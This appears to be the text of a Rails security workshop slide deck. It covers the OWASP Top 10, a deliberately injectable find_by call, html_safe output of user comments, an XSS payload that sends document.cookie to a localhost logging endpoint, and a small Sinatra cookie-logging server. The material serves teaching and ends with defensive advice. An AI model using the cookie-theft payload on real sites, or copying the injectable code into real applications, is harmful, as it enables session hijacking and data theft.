Web Applications Hacking – Ruby on Rails example.
Attack web applications by using SQL attacks, CSRF, XSS. You will learn how to extract information by generating API json / xml and how to use cookies to code injection.
2. ● Software House located in Krakow
● Ruby on Rails, Android and iOS
● Specialized in building web and mobile applications
● Collaborating with many companies and startups from all over
the world
ABOUT US:
3. 2009 - software house was founded
50 projects created
40 developers
Awards:
OUR HISTORY:
Top Web & Software Developers
in Poland 2015
Top Tens Ruby on Rails
Development Companies
8. OWASP TOP 10
1. Injection
2. Broken authentication and session management
3. Cross-Site Scripting
4. Insecure direct object reference
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross-Site Request Forgery
9. Using components with known vulnerabilities
10. Unvalidated redirects and forwards
15. # app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by title: params[:title]
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:
16.
17. # app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by “title = #{params[:title]}”
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:
24. # app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content
COMMENTS - create and show:
25.
26. # app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content.html_safe
COMMENTS - create and show:
27.
28. <!-- XSS test -->
Hi guys!
<script> alert(“I came for your cookies!“) </script>
<!-- Time to get some cookies! -->
What’s up?
<script>
xhttp = new XMLHttpRequest();
xhttp.open(“GET”, “http://localhost:4567/cookies/” + document.cookie);
xhttp.send();
</script>
XSS ATTACK - TEST AND STEALING COOKIES
29. require ‘sinatra’
require ‘logger’
logger = Logger.new ‘log/cookies.log’
get ‘/cookies/:cookie’ do
logger.info ‘=== COOKIE ===’
logger.info params[:cookie]
logger.info ‘/== COOKIE ===’
end
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
51. Sensitive data exposure
1. Credentials leaking to public repositories.
2. Lack of proper in-app authorization.
3. Debugging information in production enviroments.
4. Access not restricted, wrong access privileges.
5. Lack of encryption.
6. API responses containing sensitive data.
52. Protecting against sensitive data exposure
1. Code reviews.
2. Careful authorization.
3. Strict access.
4. Encryption.
5. API exposing only necessary information.
59. [
{
”title”: "Curabitur vel vulputate libero."
},
{
"title": "Lorem ipsum dolor sit amet."
}
]
GENERATED RAILS API - SECURED OUTPUT
60.
61. Solutions for building pretty, secure APIs
Active Model Serializers
● Object Oriented approach
● Ability to define decorating methods
● All Ruby!
● Flexible
● Easy to test
● Adapter to follow JSON API v1.0 schema
● YARD documented
Jbuilder
● Templates approach
● ERblike - might be easy for newcomers
● Flexible
● Hard to test
● No real “adapter” - if you want JSON
API v1.0, you have to do it by yourself
63. Things to remember from this workshop:
1. Never trust anything that comes from user. Params, cookies, headers,
everything. Nothing that comes from user is safe to use.
2. Always sanitize your HTML output. Especially when you’re allowing
links or images that comes from user.
3. Be careful with match routing. Just don’t use it if you don’t have to.
4. Inspect your outputs. Return only necessary information from your API.
5. Last but not least. Get someone to review your code.